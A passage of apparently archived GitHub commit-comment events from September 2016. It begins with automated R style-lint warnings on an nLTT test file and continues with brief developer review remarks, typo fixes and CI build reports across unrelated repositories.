^\n```\n[tests/testthat/test_mcmc_nltt.R:47:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L47) *style:* **lines should not be more than 80 characters.**\n```r\n​\tp <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:47:11:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n         ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:47:36:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                                  ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:47:47:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                                             ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:47:57:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                                                        ^~\n```\n[tests/testthat/test_mcmc_nltt.R:47:71:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                                                                      ^~\n```\n[tests/testthat/test_mcmc_nltt.R:47:81:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                                                                               ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:48:1:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L48) *style:* **lines should not be more than 80 characters.**\n```r\n​\tq <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:48:11:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n         ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:48:36:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                                  ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:48:47:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                                             ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:48:57:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                                                        ^~\n```\n[tests/testthat/test_mcmc_nltt.R:48:71:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                                                                      ^~\n```\n[tests/testthat/test_mcmc_nltt.R:48:81:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                                                                               ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:50:15:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\tLL_BD <- function(params, phy) {\n             ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:51:21:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tlnl <- TESS::tess.likelihood(phy[[1]], lambda = params[1], mu = params[2],\n                   ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:51:63:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tlnl <- TESS::tess.likelihood(phy[[1]], lambda = params[1], mu = params[2],\n                                                             ~^\n```\n[tests/testthat/test_mcmc_nltt.R:53:24:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L53) *style:* **Put spaces around all infix operators.**\n```r\n​\t \tprior1 <- dunif( params[1], 0, 100, log = TRUE)\n                      ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:54:24:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t \tprior2 <- dunif( params[2], 0, 100, log = TRUE)\n                      ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:55:28:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L55) *style:* **Put spaces around all infix operators.**\n```r\n​\t \treturn(lnl + prior1 + prior2)\n                          ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:59:42:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L59) *style:* **Commas should always have a space after.**\n```r\n​\t\tmcmc_nltt( q, LL_BD, c(1, 0.0), c(TRUE,TRUE),\n                                         ^\n```\n[tests/testthat/test_mcmc_nltt.R:60:30:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                            ~^\n```\n[tests/testthat/test_mcmc_nltt.R:60:46:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                                            ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:60:63:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                                                             ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:65:51:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L65) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\tmcmc_nltt( 42, LL_BD, c(1, 0.01), c(TRUE, TRUE), \n                                                  ^\n```\n[tests/testthat/test_mcmc_nltt.R:66:30:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                            ~^\n```\n[tests/testthat/test_mcmc_nltt.R:66:46:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                                            ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:66:63:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                                                             ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:71:47:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L71) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\tmcmc_nltt( p, LL_BD,c(1, -1), c(TRUE, TRUE), \n                                              ^\n```\n[tests/testthat/test_mcmc_nltt.R:72:30:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                            ~^\n```\n[tests/testthat/test_mcmc_nltt.R:72:46:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                                            ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:72:63:](https://github.com/richelbilderbeek/nLTT/blob/cc41e5c730450e9d46481a81b1932adfe7f36295/tests/testthat/test_mcmc_nltt.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                                                             ~^~\n```"}},"created_at":"2016-09-14T12:10:58Z"}
{"id":"4561551477","type":"CommitCommentEvent","actor":{"login":"jvandijk"},"repo":{"name":"Sensimity/com.sensimity.ti.client"},"payload":{"comment":{"id":19017737,"position":null,"line":null,"path":null,"commit_id":"6a98be7dd072864a5a29f2c146c65f1989ac7a17","created_at":"2016-09-14T12:11:01Z","updated_at":"2016-09-14T12:11:01Z","body":"This is a BC breaking change due to the fact that iPhone OS is removed. Are you aware of that?"}},"created_at":"2016-09-14T12:11:01Z"}
{"id":"4561554491","type":"CommitCommentEvent","actor":{"login":"fheslouin"},"repo":{"name":"ideascube/ideascube"},"payload":{"comment":{"id":19017745,"position":null,"line":null,"path":null,"commit_id":"20c6e2d41e0848fddb3ff3829720ab43a71f41a9","created_at":"2016-09-14T12:11:42Z","updated_at":"2016-09-14T12:11:42Z","body":"I will push the file with the right pattern"}},"created_at":"2016-09-14T12:11:42Z"}
{"id":"4561555054","type":"CommitCommentEvent","actor":{"login":"patmbolger"},"repo":{"name":"arun1595/MetPlus_PETS"},"payload":{"comment":{"id":19017747,"position":21,"line":21,"path":"app/jobs/company_mailer_job.rb","commit_id":"89fe5b92721aac38631567582509e79f439cd560","created_at":"2016-09-14T12:11:50Z","updated_at":"2016-09-14T12:11:50Z","body":"Please note the discussion of unlinking a file when the file is not closed - http://ruby-doc.org/stdlib-1.9.3/libdoc/tempfile/rdoc/Tempfile.html#method-i-unlink\r\n\r\nTo be safe, we need to close the file before we unlink.  So, these actions should be together.  \r\n\r\nI think that having the temple stay open (in the mailer) and finally being closed (in the job method) is risky from a process point of view.  (another reason to perform the close & unlink in the mailer, and close to where we actual fetch the file)."}},"created_at":"2016-09-14T12:11:50Z"}
{"id":"4561557236","type":"CommitCommentEvent","actor":{"login":"kinjalpatel153"},"repo":{"name":"kinjalpatel153/demo"},"payload":{"comment":{"id":19017749,"position":null,"line":null,"path":null,"commit_id":"a169fbc16da9e20445d8299476d2e39843e22f80","created_at":"2016-09-14T12:12:22Z","updated_at":"2016-09-14T12:12:22Z","body":":smile"}},"created_at":"2016-09-14T12:12:22Z"}
{"id":"4561559615","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19017754,"position":null,"line":null,"path":null,"commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T12:12:54Z","updated_at":"2016-09-14T12:12:54Z","body":"> Just having a brief look at the guide. A couple of comments from my side:\r\n> \r\n> The guide provides very little context on what a plugin is and why I'd use it. Also there's no context on script plugins vs. binary plugins and why I should even use buildSrc. What if I just want to write a standalone plugin?\r\n\r\nWe've been focusing on outline and core content first, i.e. what does the reader actually do / build, and holding off on prose until we get that right. This is by no means a final draft.\r\n\r\n \r\n> I strongly disagree that we should introduce an extension for the very first getting started guide. There's far more to be said about extensions than shown in this guide. IMHO the concept can be a guide by itself.\r\n\r\nOk, let's pick up on this one in Slack.\r\n\r\n> I don't think the plugin shown in the example is real-world by any means. I am sure readers will ask themselves: \"OK, I understand how to write a plugin that creates a Hello World task but how do I solve my actual problem with the concept of a plugin\".\r\n\r\nGetting Started guides are mutually exclusive with building something real-world. They are intentionally and explicitly about building the \"hello, world\" of whatever it is you're interested in, so that you have enough of an understanding to move onto more detailed resources, including existing materials like the User Manual."}},"created_at":"2016-09-14T12:12:54Z"}
{"id":"4561561089","type":"CommitCommentEvent","actor":{"login":"NicolasGeraud"},"repo":{"name":"gravitee-io/gravitee-rancher"},"payload":{"comment":{"id":19017758,"position":5,"line":62,"path":"graviteeio/0/docker-compose.yml","commit_id":"d63122a5f6998a7dd8308b9beb496c8045aa4c04","created_at":"2016-09-14T12:13:16Z","updated_at":"2016-09-14T12:13:16Z","body":"s/managment/management/"}},"created_at":"2016-09-14T12:13:16Z"}
{"id":"4561561417","type":"CommitCommentEvent","actor":{"login":"NicolasGeraud"},"repo":{"name":"gravitee-io/gravitee-rancher"},"payload":{"comment":{"id":19017759,"position":14,"line":68,"path":"graviteeio/0/docker-compose.yml","commit_id":"d63122a5f6998a7dd8308b9beb496c8045aa4c04","created_at":"2016-09-14T12:13:21Z","updated_at":"2016-09-14T12:13:21Z","body":"s/managment/management/"}},"created_at":"2016-09-14T12:13:21Z"}
{"id":"4561562034","type":"CommitCommentEvent","actor":{"login":"NicolasGeraud"},"repo":{"name":"gravitee-io/gravitee-rancher"},"payload":{"comment":{"id":19017761,"position":22,"line":73,"path":"graviteeio/0/docker-compose.yml","commit_id":"d63122a5f6998a7dd8308b9beb496c8045aa4c04","created_at":"2016-09-14T12:13:29Z","updated_at":"2016-09-14T12:13:29Z","body":"s/managment/management/"}},"created_at":"2016-09-14T12:13:29Z"}
{"id":"4561562707","type":"CommitCommentEvent","actor":{"login":"NicolasGeraud"},"repo":{"name":"gravitee-io/gravitee-rancher"},"payload":{"comment":{"id":19017764,"position":14,"line":20,"path":"graviteeio/0/rancher-compose.yml","commit_id":"d63122a5f6998a7dd8308b9beb496c8045aa4c04","created_at":"2016-09-14T12:13:39Z","updated_at":"2016-09-14T12:13:39Z","body":"s/managment/management/"}},"created_at":"2016-09-14T12:13:39Z"}
{"id":"4561563494","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19017765,"position":null,"line":null,"path":null,"commit_id":"193f7ba88cc44b13b0ed1d5284c39d42dd2f9e3f","created_at":"2016-09-14T12:13:49Z","updated_at":"2016-09-14T12:13:49Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 996](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13248&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:57"}},"created_at":"2016-09-14T12:13:49Z"}
{"id":"4561569192","type":"CommitCommentEvent","actor":{"login":"dpgeorge"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":19017801,"position":115,"line":115,"path":"stmhal/boards/pllvalues.py","commit_id":"0fd3d8d19fe63e1ddbe6bcf86efef53406c21844","created_at":"2016-09-14T12:15:11Z","updated_at":"2016-09-14T12:15:11Z","body":"Out of habit, and good practice.  Functions (like main) are more efficient than module-level code, and they have private local variables rather than using globals.  Also, you can return from a function, not from an if-block within a module."}},"created_at":"2016-09-14T12:15:11Z"}
{"id":"4561569260","type":"CommitCommentEvent","actor":{"login":"frankmorgner"},"repo":{"name":"CardContact/OpenSC"},"payload":{"comment":{"id":19017802,"position":18,"line":92,"path":"src/libopensc/card-sc-hsm.c","commit_id":"643bc9bfa058315e8e0c225868ec35754d5dbff8","created_at":"2016-09-14T12:15:12Z","updated_at":"2016-09-14T12:15:12Z","body":"Did you mean to check for `apdu.sw2 == 0x00`?"}},"created_at":"2016-09-14T12:15:12Z"}
{"id":"4561569980","type":"CommitCommentEvent","actor":{"login":"blendhk"},"repo":{"name":"blendhk/hk"},"payload":{"comment":{"id":19017803,"position":null,"line":null,"path":null,"commit_id":"3c8cfb67bb03dd83052273d212c7a5d8dfb2b060","created_at":"2016-09-14T12:15:20Z","updated_at":"2016-09-14T12:15:20Z","body":"Centrage de l'image "}},"created_at":"2016-09-14T12:15:20Z"}
{"id":"4561573738","type":"CommitCommentEvent","actor":{"login":"Evseev96"},"repo":{"name":"Evseev96/Electron_PolyBranch"},"payload":{"comment":{"id":19017811,"position":null,"line":null,"path":null,"commit_id":"7bfdca30b075936d18e75d8b528410db490a3baa","created_at":"2016-09-14T12:16:10Z","updated_at":"2016-09-14T12:16:10Z","body":"It's sucks! You aren't really good programmer. It's govno code! Get out of here! "}},"created_at":"2016-09-14T12:16:10Z"}
{"id":"4561575639","type":"CommitCommentEvent","actor":{"login":"Aguiiar"},"repo":{"name":"Aguiiar/TesteTDSA"},"payload":{"comment":{"id":19017815,"position":null,"line":null,"path":null,"commit_id":"80ee5b77868864a60830bf597c974db57d0721f5","created_at":"2016-09-14T12:16:34Z","updated_at":"2016-09-14T12:16:34Z","body":"kk"}},"created_at":"2016-09-14T12:16:34Z"}
{"id":"4561577733","type":"CommitCommentEvent","actor":{"login":"Mazda--"},"repo":{"name":"DirtyUnicorns/android_packages_apps_Settings"},"payload":{"comment":{"id":19017818,"position":null,"line":null,"path":null,"commit_id":"2cc5f0457adfb02100c3c030badb5b30eeaa2afa","created_at":"2016-09-14T12:17:03Z","updated_at":"2016-09-14T12:17:03Z","body":"@snak3ater thanks again! http://gerrit.dirtyunicorns.com/#/c/1974/"}},"created_at":"2016-09-14T12:17:03Z"}
{"id":"4561580383","type":"CommitCommentEvent","actor":{"login":"heiko-braun"},"repo":{"name":"heiko-braun/wildfly-swarm-1"},"payload":{"comment":{"id":19017825,"position":77,"line":135,"path":"container/src/main/java/org/wildfly/swarm/container/runtime/RuntimeServer.java","commit_id":"c8ab2d84b8255d207dd91c9ddccbdf61fff8cf27","created_at":"2016-09-14T12:17:38Z","updated_at":"2016-09-14T12:17:38Z","body":"The new ctor is the main change to wf-core"}},"created_at":"2016-09-14T12:17:38Z"}
{"id":"4561581984","type":"CommitCommentEvent","actor":{"login":"heiko-braun"},"repo":{"name":"heiko-braun/wildfly-swarm-1"},"payload":{"comment":{"id":19017827,"position":5,"line":42,"path":"pom.xml","commit_id":"c8ab2d84b8255d207dd91c9ddccbdf61fff8cf27","created_at":"2016-09-14T12:17:59Z","updated_at":"2016-09-14T12:17:59Z","body":"Needs to be removed once we have a target release"}},"created_at":"2016-09-14T12:17:59Z"}
{"id":"4561585227","type":"CommitCommentEvent","actor":{"login":"Nyks45"},"repo":{"name":"Nyks45/OctoDex-Kernel"},"payload":{"comment":{"id":19017833,"position":null,"line":null,"path":null,"commit_id":"d6066525fc4e96cd6ce180922f2e47c5363f039e","created_at":"2016-09-14T12:18:42Z","updated_at":"2016-09-14T12:18:42Z","body":"if u can see i already took that commit and edited that u can see your commit there is nothiing about your script sorry but taht codes are universal and u can fidn them with writing internet i can't see any option codes -color codes etc. on your script the codes that exist on your script is not your codes they needed to be used on all kernel build scripts so no i am not giving credits to u"}},"created_at":"2016-09-14T12:18:42Z"}
{"id":"4561587238","type":"CommitCommentEvent","actor":{"login":"heiko-braun"},"repo":{"name":"heiko-braun/wildfly-swarm-1"},"payload":{"comment":{"id":19017840,"position":62,"line":62,"path":"container/src/main/java/org/wildfly/swarm/container/internal/BootstrapPersister.java","commit_id":"c8ab2d84b8255d207dd91c9ddccbdf61fff8cf27","created_at":"2016-09-14T12:19:12Z","updated_at":"2016-09-14T12:19:12Z","body":"When Swarm boots it reads from the precomputed values. Any subsequent :reload op however, will fetch the config from the XML file."}},"created_at":"2016-09-14T12:19:12Z"}
{"id":"4561588740","type":"CommitCommentEvent","actor":{"login":"btd"},"repo":{"name":"InGo-LLP/docs"},"payload":{"comment":{"id":19017841,"position":23,"line":50,"path":"apiary.apib","commit_id":"ac8c9f81c8683d596becd507f5e8d421a5201edc","created_at":"2016-09-14T12:19:33Z","updated_at":"2016-09-14T12:19:33Z","body":"Maybe use array there?"}},"created_at":"2016-09-14T12:19:33Z"}
{"id":"4561588886","type":"CommitCommentEvent","actor":{"login":"osfans"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19017842,"position":8,"line":8,"path":"src/gear/charset_translator.cc","commit_id":"5c5b87c18680b3dd45c9efa1196ea4b4cdefd910","created_at":"2016-09-14T12:19:36Z","updated_at":"2016-09-14T12:19:36Z","body":"好像只能用boost了 要包新的库。或者直接用指针转转看。节后再来试试"}},"created_at":"2016-09-14T12:19:36Z"}
{"id":"4561592331","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19017849,"position":null,"line":null,"path":null,"commit_id":"959128179ece6069beb1b43abf24a0961e6d1896","created_at":"2016-09-14T12:20:24Z","updated_at":"2016-09-14T12:20:24Z","body":"IT COMPILES!"}},"created_at":"2016-09-14T12:20:24Z"}
{"id":"4561595289","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19017861,"position":null,"line":null,"path":null,"commit_id":"ce6a0b4d0bdb378ac693d39f4be1a9d454518825","created_at":"2016-09-14T12:21:05Z","updated_at":"2016-09-14T12:21:05Z","body":"-.-"}},"created_at":"2016-09-14T12:21:05Z"}
{"id":"4561596745","type":"CommitCommentEvent","actor":{"login":"frankmorgner"},"repo":{"name":"CardContact/OpenSC"},"payload":{"comment":{"id":19017863,"position":60,"line":133,"path":"src/libopensc/card-sc-hsm.c","commit_id":"643bc9bfa058315e8e0c225868ec35754d5dbff8","created_at":"2016-09-14T12:21:25Z","updated_at":"2016-09-14T12:21:25Z","body":"Wouldn't it be better to always cache the fcp template by passing `&priv->dffcp` instead of `file_out`? This way you would also be able to avoid transmits by multiple subsequent calls to `sc_hsm_select_file_ex` with `file_out == NULL`."}},"created_at":"2016-09-14T12:21:25Z"}
{"id":"4561597222","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19017864,"position":null,"line":null,"path":null,"commit_id":"959128179ece6069beb1b43abf24a0961e6d1896","created_at":"2016-09-14T12:21:30Z","updated_at":"2016-09-14T12:21:30Z","body":"The damage the enemy deals keeps increasing though, please fix this somehow!"}},"created_at":"2016-09-14T12:21:30Z"}
{"id":"4561600867","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19017871,"position":null,"line":null,"path":null,"commit_id":"6ab2744675bbb53808cc4006ed8b05ed5d7664a0","created_at":"2016-09-14T12:22:19Z","updated_at":"2016-09-14T12:22:19Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 997](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13251&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:12:43"}},"created_at":"2016-09-14T12:22:19Z"}
{"id":"4561602444","type":"CommitCommentEvent","actor":{"login":"jaccokrijnen"},"repo":{"name":"leksah/leksah"},"payload":{"comment":{"id":19017872,"position":null,"line":null,"path":null,"commit_id":"ec00591ac70e82de2c76ca03767cedc667a09065","created_at":"2016-09-14T12:22:40Z","updated_at":"2016-09-14T12:22:40Z","body":"I'd rather have as much of this stuff inside the code instead of in external files (in the case of modifying the prefs datatype, I would get a compile error/warning to modify the default prefs while I could easilly forget to `update data/prefs.lkshp`).\r\n\r\nPerhaps a fourth option:\r\n * Remove the prefs file in `data` and generate it at first startup from this code. Add documentation to the user guide for sys admins (who could add their prefs to the data folder in which case it would still be picked up)."}},"created_at":"2016-09-14T12:22:40Z"}
{"id":"4561607687","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19017875,"position":null,"line":null,"path":null,"commit_id":"00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e","created_at":"2016-09-14T12:23:43Z","updated_at":"2016-09-14T12:23:43Z","body":"5626-Plant-HX-min-DT (mjwitte) - i386-Windows-7-VisualStudio-12: OK (2336 of 2336 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-14T12:23:43Z"}
{"id":"4561617132","type":"CommitCommentEvent","actor":{"login":"CSchulz"},"repo":{"name":"reprovinci/grunticon-lib"},"payload":{"comment":{"id":19017896,"position":null,"line":null,"path":null,"commit_id":"ad46384fb8055dbca5f24efaf476e8d24a8cef50","created_at":"2016-09-14T12:25:49Z","updated_at":"2016-09-14T12:25:49Z","body":"What kind of argument error? Is there any open issue for this?"}},"created_at":"2016-09-14T12:25:49Z"}
{"id":"4561617236","type":"CommitCommentEvent","actor":{"login":"jeroenooms"},"repo":{"name":"hadley/r-internals"},"payload":{"comment":{"id":19017897,"position":32,"line":29,"path":"pairlists.md","commit_id":"57e1097a8c77e5e45dab9ccbd07f5ac71cf4d029","created_at":"2016-09-14T12:25:50Z","updated_at":"2016-09-14T12:25:50Z","body":"I don't understand this. Where do `x` and `nxt` come from? It also misses a closing bracket after `for()`."}},"created_at":"2016-09-14T12:25:50Z"}
{"id":"4561618002","type":"CommitCommentEvent","actor":{"login":"adrianotrentim"},"repo":{"name":"BoletoNet/boletonet"},"payload":{"comment":{"id":19017899,"position":null,"line":null,"path":null,"commit_id":"ac682a3a77390db5db8fd6ef1e7c79bac0916e4a","created_at":"2016-09-14T12:26:00Z","updated_at":"2016-09-14T12:26:00Z","body":"Não sei o motivo ao qual levou a essa alteração, mas está com erro. A função formataNossoNumero, deve ser sempre chamada, pois ela calcula o dv do nosso numero."}},"created_at":"2016-09-14T12:26:00Z"}
